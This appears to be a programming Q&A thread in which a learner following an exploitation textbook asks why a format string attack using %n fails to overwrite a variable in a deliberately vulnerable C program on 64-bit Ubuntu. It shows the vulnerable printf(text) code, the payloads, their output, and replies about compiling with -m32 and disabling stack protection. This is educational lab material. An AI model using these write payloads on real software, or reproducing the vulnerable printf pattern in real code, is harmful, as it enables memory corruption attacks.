# How to Write in Arbitrary Memory Addresses

Tags: c, memory-management, gdb, buffer-overflow

Regarding topic about "Writing to Arbitrary Memory Addresses" From hacking the art of exploitation".

When I issues to change value of test_val, but the value of test_val doesn't change. Anyone could help me how can I change the value of text_val where I'm using x64_ubuntu_v12.10.

```
-[*] test_val @ 0x00601058 = -72 0xffffffb8
-./fmt_vuln $(printf "\x58\x10\x60\x00")%x%x%100x%n

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[]) {
char text[1024];
static int test_val = -72;
if(argc < 2) {
printf("Usage: %s <text to print>\n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way to print user-controlled input:\n");
printf("%s", text);
printf("\nThe wrong way to print user-controlled input:\n");
printf(text);
printf("\n");
// Debug output
printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val,
test_val);
exit(0);
}
```

Thanks if anyone could help me on this problems.

Output:
    root@ubuntu:~/gcc# fmt_vuln AAAA%08x.%08x.%08x.%08x
    The right way to print user-controlled input: AAAA%08x.%08x.%08x.%08x
    The wrong way to print user-controlled input:  AAAA75820000.755fcad0.75328900.75820017
    [*] test_val @ 0x00601058 = -72 0xffffffb8

```
root@ubuntu:~/gcc# fmt_vuln $(printf "\x58\x10\x60\x00")%08x.%08x.%08x.%n
The right way to print user-controlled input: X`%08x.%08x.%08x.%n
The wrong way to print user-controlled input: X`faa82000.fa85ead08a900.
[*] test_val @ 0x00601058 = -72 0xffffffb8
```

Comment: Can you add the output you receive?

Comment: Most likely because your environment is 64bit. Compile with `-m32` (and type correct address, of course)

Comment: But I've already try -m32 , it will change to different memory address. I think it should probably need access kernel memory for access to this memory address.

Comment: Can u please describe what are Arbitrary Memory Addresses? In java it is said that "Remotely loaded code cannot access arbitrary addresses in memory." So what are these arbitrary addresses?

Answer (score 0):

I am actually trying those vulnerability methods on a modern 64 bits processor, and you have to disable the SSP by `gcc`.

Example: `gcc -m32 -fno-stack-protector <myprogram.c>`